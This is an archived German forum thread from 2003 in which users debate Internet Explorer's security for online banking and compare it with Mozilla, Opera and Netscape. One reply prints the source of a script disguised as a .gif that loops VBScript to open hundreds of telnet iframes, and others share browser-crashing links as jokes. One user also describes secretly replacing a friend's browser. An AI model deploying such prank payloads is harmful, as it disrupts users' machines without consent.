Archiv verlassen und diese Seite im Standarddesign anzeigen : Warum kein IE
Hallo Leute,
Eine Freundin hat mir letztens erzählt, das sie sich für Win98se den Neuen IE herruntergezogen hat
um weiterhin Onlinebanking zu machen. Als ich das gehört habe fing ich mir erst mal an in den Haaren zu raufen. Als sie mich jedoch fragte, warum das so schlim sei, konnte ich nur sagen das
der IE ne wandelde Sicherheitslücke ist.
Was würdet ihr ihr erzählen, und was hat der IE genau für Sicherheitslücken???
mfg.
Sebastian
ps. Ich weis das das hier kein Forum für MS Produkte ist, aber hier sind EDV mäßig gesehen, die hellsten Leute!!!!
>Was würdet ihr ihr erzählen, und was hat der IE genau für Sicherheitslücken???
Würde Ihr sagen, dass der IE nahtlos in das Windows System integriert ist und viele
andere Programme darauf zugreifen (MSOffice, Outlook, uvm.) , was es besonders anfällig für Fehler, Würmer und Viren macht.
Dann würde ich ihr zeigen, wie sich ein 0190dialer automatisch und unbemerkt installieren kann.
Welche Fehler jetzt genau der IE hat, das weiß aufgrund der fehenden Transparenz niemand.
Gruß
christian.
http://www.google.at/search?q=sicherheitsl%C3%BCcken+internet+explorer&ie=UTF-8&oe=UTF-8&hl=de&btnG=Google-Suche&meta=lr%3Dlang_de
Antwort genug?
grüße wickey
Da gibts doch auch noch son Bild, das tausend telnet-Fenster öffnet, wenn mans mit dem IE ansieht
Echt? Goil!
Haste davon noch die URL?
/* Mfg, Elias */
Das steht hier irgendwo im forum, is noch nicht allzulang her
Das is schon nicht mehr auf dem Server ;)
Ist nen Skript mit der Dateierweiterung *.jpeg
Achso, weil bei einem normalen Bild kann das ja fast nicht sein...
/* Mfg, Elias */
mozilla zb ist viel angenehmer im gebraucht, und outlook express ist die quelle allen übels eines jeden winsystems (board, stimmt des so? ;)) - auf alle fälle macht der fast nur probleme ...
ie hat viele nachteile:
- msn autosearch suckt hart (standart eingeschaltet) - sucht ewig nach domains ...
- kein popupblocker oder so
- keine tabs
... die zeit, die man beim aufstarten verliert, gewinnt man beim surfen ;)
aber trotzdem, auf einem win system brauchts halt den neusten ie, ist zu tief ins system eingebaut, ganzes dateimanagement basiert darauf ...
derRichard
27.02.03, 14:59
warum kein ie?
darum: http://www.nod.at/cool.gif (mit dem IE NICHT öffnen!!!!)
lieber zuerst ein wget und dann cat :D
//richard
LOL, geiles script...
/* Mfg, Elias */
In einer der letzten CTs (Ende letztes Jahr oder Anfang dieses) wurde mal ein Vergleich zwischen IE, Mozilla und Opera gemacht. Dabei wurde alles angesprochen was dem normalen User wichtig ist. Kompatiblität, Sicherheit, Kompfort etc.
Dabei kam der IE nur bei der Kompatiblität gut weg. Und das auch nur weil sie sich die Standarts zurechtgebogen haben. Daher wirken die anderen Browser dann als inkompatibel obwohl es der IE ist der nicht richtig funktioniert.
In allem anderen ist der IE dann so richtig durchgefallen. Es wurden dutzende Adressen mit Plugins genannt die aus dem IE erstmal einen vernünftigen Browser machen sollen. Und damit erreicht er dann gerade mal das unterste Level von dem was die anderen Browser schon von vorne herrein können.
Tach!
Bin auf der Arbeit, und habe nur Win NT4 und IE5.5 zur Verfügung
Habe trotz Hinweis den Link von Richard geöffnet.
Hölle!
Also, ich bin kuriert. Mir kommt kein MS mehr auf die Platte...
Vor allem, weil sowas von MS selbst zu kommen scheint.
Was genau passiert da eigentlich?
Cheers
Michael
derRichard
27.02.03, 16:31
Original geschrieben von Gujeroo
Was genau passiert da eigentlich?
hallo!
das skript öffnet immer "telnet://www.microsoft.com:80" sonst "nix".
//richard
hi
öffne das *bild* mal mit einem editor
<html>
<body>
<H1> have fun! ;-) </H1>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
Gruß HL
sticky bit
28.02.03, 01:52
Dumm nur, dass es bei manchen Banken tatsächlich so ist dass man ohne IE kein funktionierendes Online-Banking zu Stande bringt. N' Grund IMHO die Bank zu wechseln, nicht unbedingt wg. IE ansich aber ich find diese Ignoranz mancher Web-Designer, nach dem Motto alle nicht IE-User bzw. Nicht-Flash oder Java oder JavaScript sondern auf Plaintext-Stehende-Benutzer auszuschliessen einfach *******e und das Geschäft versauen sich die Firmen die son Zeug einsetzten eigentlich auch noch damit wenn sie potentielle Kunden aussperren...
steve-bracket
28.02.03, 06:40
Ich benutzte unter Linux den Webbrowser von Netscape (Version weiß ich nicht)
Da geht alles. Flash, Java usw usw.
Damit funktioniert auch Telebanking.
Ob nun Netscape oder IE besser ist kann ich nicht beantworten. (will ich auch nicht)
fG Steve
Moin!
Mich würd mal interessieren, ob nicht eigentlich alle Browser dieses Skript so ausführen, wenn JavaScript eingeschaltet ist. Oder ist das tatsächlich nur IE spezifisch?
Cheers
Michael
Original geschrieben von Gujeroo
Moin!
Mich würd mal interessieren, ob nicht eigentlich alle Browser dieses Skript so ausführen, wenn JavaScript eingeschaltet ist. Oder ist das tatsächlich nur IE spezifisch?
Cheers
Michael
Mozilla tut's jedenfalls nicht :)
Grüßle
Spirou :D
Original geschrieben von liquid
Hallo Leute,
Eine Freundin hat mir letztens erzählt, das sie sich für Win98se den Neuen IE herruntergezogen hat
um weiterhin Onlinebanking zu machen. Als ich das gehört habe fing ich mir erst mal an in den Haaren zu raufen. Als sie mich jedoch fragte, warum das so schlim sei, konnte ich nur sagen das
der IE ne wandelde Sicherheitslücke ist.
Was würdet ihr ihr erzählen, und was hat der IE genau für Sicherheitslücken???
mfg.
Sebastian
ps. Ich weis das das hier kein Forum für MS Produkte ist, aber hier sind EDV mäßig gesehen, die hellsten Leute!!!!
Hi Sebastian,
Es ist grundsätzlich schwer jemanden etwas Negatives begreiflich zu machen, wenn alles so schön läuft, wies beim MSIE den Anschein hat.
Machst wie ich.
Heimlich Opera installieren, IE dicht machen, so dass es keinen Spass mehr damit macht zu surfen, dann Freundin Opera zeigen, weils viel schöner damit ist.
:D
Funzt!
Sorry, vielleicht etwas off Topic.
Cheers
Lothy:D
Dieser Link ist auch ganz nett. :)
www.raus.de/crashme/
Aber ja nicht mit dem IE öffnen, ihr seid vorgewarnt. :D
Bei Verwendung des Mozilla Browsers ist der Link harmlos. ;)
Ich hab den Link mit Opera geöffnet :(
Da war mein Download wech...
/* Mfg, Elias */
Original geschrieben von Catonga
Dieser Link ist auch ganz nett. :)
www.raus.de/crashme/
Aber ja nicht mit dem IE öffnen, ihr seid vorgewarnt. :D
Hi,
beim Opera (Linux) sollte man ganz schnell refuse pop-up-window einschalten
ich war mächtig überrascht, daß so viele Fenster so schnell aufgehen.:p
..zum Thema, jemanden vom IE abzubringen ist schwer, da zieht auch die Meldung nicht, daß bei jedem Update Daten an M$ gesendet werden oder die Sicherheit sehr bescheiden ist.
Gruß
Michael
Original geschrieben von Catonga
Kommt auf die Sicherheitseinstellungen an. Wenn man javascript im vollem Umfang zulässt, kanns unter Mozilla auch recht nervig werden
Original geschrieben von m0L
Ich hab den Link mit Opera geöffnet :(
Da war mein Download wech...
/* Mfg, Elias */
Oh, sorry, also das der Opera auch darauf anspricht, das hab ich nicht
gewußt, den benutze ich nämlich nie.
Original geschrieben von
sepp2k
Kommt auf die Sicherheitseinstellungen an. Wenn man javascript im vollem Umfang zulässt, kanns unter Mozilla auch recht nervig werden
Ok das wäre natürlich möglich.
Ich bin von den Voreinstellungen ausgegangen, also so wie Mozilla standardmäßig ausgeliefert wird.
Jap, NP!
/* Mfg, Elias */
Bei mir kamen die ganzen Fenster. Und ich habe Mozilla bei den Standart Einstellungen...
Schwarzer'Engel
28.02.03, 18:03
Hm, hab da mal ne Frage:
Ich mache unter Linux mit Netscape/Mozilla bei der Spasskasse OnlineBanking (ohne Java). Ist das sicher oder bekomm ich früher oder später probleme damit?
Original geschrieben von screenyfs
Bei mir kamen die ganzen Fenster. Und ich habe Mozilla bei den Standart Einstellungen...
Das ist komisch. :confused:
Bei mir passiert das nicht.
Weder unter Linux (Mozilla 1.2) noch unter Windows (Mozilla 1.0).
Beide laufen mit den standard Einstellungen.
Hmm, nehmen wir uns mal ein Argument als Beispiel, die Kompatibilität.
Im Linux Magazin wurden ja Ende letzten Jahres auch Browser verglichen, da haben auf standardkonformen Seiten viele der unter Linux benutzten Browser gepatzt, der IE komischerweise nicht. Hat natürlich zu wütenden Leserbriefen geführt, obwohl ja nun eigentlich dem Linux Mag Schummelei zugunsten des IE kaum vorzuwerfen ist.
Und, was auch zur Kompatibilität zählt: es wurde weiter oben erwähnt, Mozilla und Co könnten schon im Grundzustand alles, der IE nichts. In der Praxis kennt aber jeder den Fall, daß gerade Mozilla laufend nach Downloads für irgendwelche Plugins sucht, der IE stellt die gleichen Inhalte ohne zu Murren dar. Wer beherrscht da also mehr?
Geschwindigkeit beim Seitendownload/-Aufbau? Zumindest unter Windows ist Mozilla im direkten Vergleich saulangsam, Opera kann ich nicht beurteilen, glaubt man aber diversen Browsertests, z.B. ct' und ander Zeitschriften, hat es in dieser Beziehung seit IE6 die Konkurenz schwer.
Wo ich zustimme, ist das Sicherheitsproblem, das läßt sich aber mit den richtigen Einstellungen und dem Einspielen aller relevanten Patche minimieren.
Aber Mozilla hat natürlich auch (mindestens) 2 Dinge voraus: die Tabs und den Downloadmanager. Dafür ist im IE seit 5.5 nun wieder die Druckvorschau besser.
Zu den (Telnet) Links oben: kann ich nicht ausprobieren, weder mit IE, noch mit Mozilla, mein Virenscanner blockt das Script als schädlich ab.
MfG
vBulletin® v3.8.6, Copyright ©2000-2012, Jelsoft Enterprises Ltd.